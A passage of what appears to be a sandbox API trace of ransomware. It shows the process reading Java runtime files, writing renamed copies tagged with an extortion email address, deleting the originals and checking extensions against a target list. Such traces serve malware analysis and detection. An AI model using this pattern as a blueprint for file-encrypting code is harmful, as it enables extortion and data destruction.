lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x97450, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x97450, lpOverlapped=0x0) returned 1 [0196.286] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.286] WriteFile (in: hFile=0x37c, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xf8, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xf8, lpOverlapped=0x0) returned 1 [0196.286] SetEndOfFile (hFile=0x37c) returned 1 [0196.286] CloseHandle (hObject=0x37c) returned 1 [0196.286] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.286] SetEndOfFile (hFile=0x378) returned 1 [0196.595] CloseHandle (hObject=0x378) returned 1 [0196.595] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.595] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\gstreamer-lite.dll")) returned 1 [0196.595] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.595] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.595] lstrlenW (lpString=".doc") returned 4 [0196.595] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.595] lstrlenW (lpString=".docx") returned 5 [0196.596] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0196.596] lstrlenW (lpString=".pdf") returned 4 [0196.596] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.596] lstrlenW (lpString=".xls") returned 4 [0196.596] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.596] lstrlenW (lpString=".xlsx") returned 5 [0196.596] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0196.596] lstrlenW (lpString=".ppt") returned 4 [0196.596] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.596] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.596] lstrlenW (lpString=".zip") returned 4 [0196.596] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.596] lstrlenW (lpString=".rar") returned 4 [0196.596] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.596] lstrlenW (lpString=".bz2") returned 4 [0196.596] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.596] lstrlenW (lpString=".7z") returned 3 [0196.596] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.596] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.596] lstrlenW (lpString=".dbf") returned 4 [0196.596] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.596] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.596] lstrlenW (lpString=".1cd") returned 4 [0196.596] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.596] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.596] lstrlenW (lpString=".jpg") returned 4 [0196.596] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.596] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.596] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.597] lstrlenW (lpString=".doc") returned 4 [0196.597] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.597] lstrlenW (lpString=".docx") returned 5 [0196.597] lstrcmpiW (lpString1=".docx", lpString2="e.dll") returned -1 [0196.597] lstrlenW (lpString=".pdf") returned 4 [0196.597] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.597] lstrlenW (lpString=".xls") returned 4 [0196.597] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.597] lstrlenW (lpString=".xlsx") returned 5 [0196.597] lstrcmpiW (lpString1=".xlsx", lpString2="e.dll") returned -1 [0196.597] lstrlenW (lpString=".ppt") returned 4 [0196.597] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.597] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.597] lstrlenW (lpString=".zip") returned 4 [0196.597] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.597] lstrlenW (lpString=".rar") returned 4 [0196.597] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.597] lstrlenW (lpString=".bz2") returned 4 [0196.597] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.597] lstrlenW (lpString=".7z") returned 3 [0196.597] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.597] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.598] lstrlenW (lpString=".dbf") returned 4 [0196.598] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.598] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.598] lstrlenW (lpString=".1cd") returned 4 [0196.598] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.598] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\gstreamer-lite.dll") returned 57 [0196.598] lstrlenW (lpString=".jpg") returned 4 [0196.598] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.598] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0196.598] lstrlenW (lpString="java-rmi.exe") returned 12 [0196.598] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.598] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=15936) returned 1 [0196.598] CloseHandle (hObject=0x378) returned 1 [0196.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe")) returned 0x20 [0196.599] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.599] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.599] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.599] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.599] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0196.600] GetLastError () returned 0x0 [0196.600] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x3e40, lpOverlapped=0x0) returned 1 [0196.602] WriteFile (in: hFile=0x368, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x3e50, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x3e50, lpOverlapped=0x0) returned 1 [0196.603] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.603] WriteFile (in: hFile=0x368, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xec, lpOverlapped=0x0) returned 1 [0196.603] SetEndOfFile (hFile=0x368) returned 1 [0196.603] CloseHandle (hObject=0x368) returned 1 [0196.603] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.603] SetEndOfFile (hFile=0x378) returned 1 [0196.604] CloseHandle (hObject=0x378) returned 1 [0196.605] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.605] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java-rmi.exe")) returned 1 [0196.605] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.605] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.605] lstrlenW (lpString=".doc") returned 4 [0196.605] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.605] lstrlenW (lpString=".docx") returned 5 [0196.605] lstrcmpiW (lpString1=".docx", lpString2="i.exe") returned -1 [0196.605] lstrlenW (lpString=".pdf") returned 4 [0196.605] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.605] lstrlenW (lpString=".xls") returned 4 [0196.605] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.605] lstrlenW (lpString=".xlsx") returned 5 [0196.605] lstrcmpiW (lpString1=".xlsx", lpString2="i.exe") returned -1 [0196.606] lstrlenW (lpString=".ppt") returned 4 [0196.606] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.606] lstrlenW (lpString=".zip") returned 4 [0196.606] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString=".rar") returned 4 [0196.606] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString=".bz2") returned 4 [0196.606] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.606] lstrlenW (lpString=".7z") returned 3 [0196.606] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.606] lstrlenW (lpString=".dbf") returned 4 [0196.606] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.606] lstrlenW (lpString=".1cd") returned 4 [0196.606] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.606] lstrlenW (lpString=".jpg") returned 4 [0196.606] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.606] lstrlenW (lpString=".doc") returned 4 [0196.606] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.606] lstrlenW (lpString=".docx") returned 5 [0196.606] lstrcmpiW (lpString1=".docx", lpString2="i.exe") returned -1 [0196.606] lstrlenW (lpString=".pdf") returned 4 [0196.606] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString=".xls") returned 4 [0196.606] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString=".xlsx") returned 5 [0196.606] lstrcmpiW (lpString1=".xlsx", lpString2="i.exe") returned -1 [0196.606] lstrlenW (lpString=".ppt") returned 4 [0196.606] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0196.606] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.607] lstrlenW (lpString=".zip") returned 4 [0196.607] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0196.607] lstrlenW (lpString=".rar") returned 4 [0196.607] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0196.607] lstrlenW (lpString=".bz2") returned 4 [0196.607] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0196.607] lstrlenW (lpString=".7z") returned 3 [0196.607] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0196.607] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.607] lstrlenW (lpString=".dbf") returned 4 [0196.607] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0196.607] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.607] lstrlenW (lpString=".1cd") returned 4 [0196.607] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0196.607] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java-rmi.exe") returned 51 [0196.607] lstrlenW (lpString=".jpg") returned 4 [0196.607] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0196.607] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0196.607] lstrlenW (lpString="java.dll") returned 8 [0196.607] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.607] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=159808) returned 1 [0196.608] CloseHandle (hObject=0x378) returned 1 [0196.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll")) returned 0x20 [0196.608] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.608] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.608] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.608] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.608] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0196.784] GetLastError () returned 0x0 [0196.784] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x27040, lpOverlapped=0x0) returned 1 [0196.837] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x27050, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x27050, lpOverlapped=0x0) returned 1 [0196.840] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.840] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.840] SetEndOfFile (hFile=0x334) returned 1 [0196.841] CloseHandle (hObject=0x334) returned 1 [0196.841] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.841] SetEndOfFile (hFile=0x378) returned 1 [0196.843] CloseHandle (hObject=0x378) returned 1 [0196.843] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.843] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.dll")) returned 1 [0196.843] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.843] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.843] lstrlenW (lpString=".doc") returned 4 [0196.843] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.843] lstrlenW (lpString=".docx") returned 5 [0196.843] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0196.843] lstrlenW (lpString=".pdf") returned 4 [0196.844] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".xls") returned 4 [0196.844] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".xlsx") returned 5 [0196.844] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0196.844] lstrlenW (lpString=".ppt") returned 4 [0196.844] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.844] lstrlenW (lpString=".zip") returned 4 [0196.844] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".rar") returned 4 [0196.844] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString=".bz2") returned 4 [0196.844] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.844] lstrlenW (lpString=".7z") returned 3 [0196.844] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.844] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.844] lstrlenW (lpString=".dbf") returned 4 [0196.844] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.844] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.844] lstrlenW (lpString=".1cd") returned 4 [0196.844] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.844] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.844] lstrlenW (lpString=".jpg") returned 4 [0196.844] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.844] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.844] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.844] lstrlenW (lpString=".doc") returned 4 [0196.844] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".docx") returned 5 [0196.845] lstrcmpiW (lpString1=".docx", lpString2="a.dll") returned -1 [0196.845] lstrlenW (lpString=".pdf") returned 4 [0196.845] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".xls") returned 4 [0196.845] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".xlsx") returned 5 [0196.845] lstrcmpiW (lpString1=".xlsx", lpString2="a.dll") returned -1 [0196.845] lstrlenW (lpString=".ppt") returned 4 [0196.845] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.845] lstrlenW (lpString=".zip") returned 4 [0196.845] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".rar") returned 4 [0196.845] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0196.845] lstrlenW (lpString=".bz2") returned 4 [0196.845] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0196.845] lstrlenW (lpString=".7z") returned 3 [0196.845] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0196.845] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.845] lstrlenW (lpString=".dbf") returned 4 [0196.845] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0196.845] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.845] lstrlenW (lpString=".1cd") returned 4 [0196.845] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0196.845] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.dll") returned 47 [0196.845] lstrlenW (lpString=".jpg") returned 4 [0196.845] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0196.846] lstrcmpiW (lpString1=".exe", lpString2=".bat") returned 1 [0196.846] lstrlenW (lpString="java.exe") returned 8 [0196.846] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.846] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=206912) returned 1 [0196.846] CloseHandle (hObject=0x378) returned 1 [0196.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe")) returned 0x20 [0196.846] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0196.846] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0196.846] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.847] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.847] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0196.847] GetLastError () returned 0x0 [0196.847] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x32840, lpOverlapped=0x0) returned 1 [0196.901] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x32850, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x32850, lpOverlapped=0x0) returned 1 [0196.905] ReadFile (in: hFile=0x378, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0196.905] WriteFile (in: hFile=0x334, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe4, lpOverlapped=0x0) returned 1 [0196.905] SetEndOfFile (hFile=0x334) returned 1 [0196.906] CloseHandle (hObject=0x334) returned 1 [0196.906] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0196.906] SetEndOfFile (hFile=0x378) returned 1 [0196.908] CloseHandle (hObject=0x378) returned 1 [0196.908] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0196.909] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\java.exe")) returned 1 [0196.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.909] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\java.exe") returned 47 [0196.909] lstrlenW (lpString=".doc") returned 4 [0196.909] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0196.909] lstrlenW (lpString=".docx") returned 5 [0196.909] lstrcmpiW (lpString1=".docx", lpString2="a.exe") returned -1 [0196.909] lstrlenW (lpString=".pdf") returned 4 